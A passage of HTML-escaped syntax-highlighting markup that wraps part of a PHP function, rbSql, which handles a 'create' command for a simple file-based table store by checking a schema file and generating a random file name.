!important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbSql&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$cmd&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-21&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;switch&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$cmd&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-22&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;case&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;create&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-23&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;SCHEMA&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-24&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;for&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;lt;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-25&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$i&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;===&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strtolower&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-26&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;				&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error6&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-27&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-28&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-29&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileName&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;../../rbSql/rbSql_&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;md5&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rand&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;10000000&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;100000000&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; 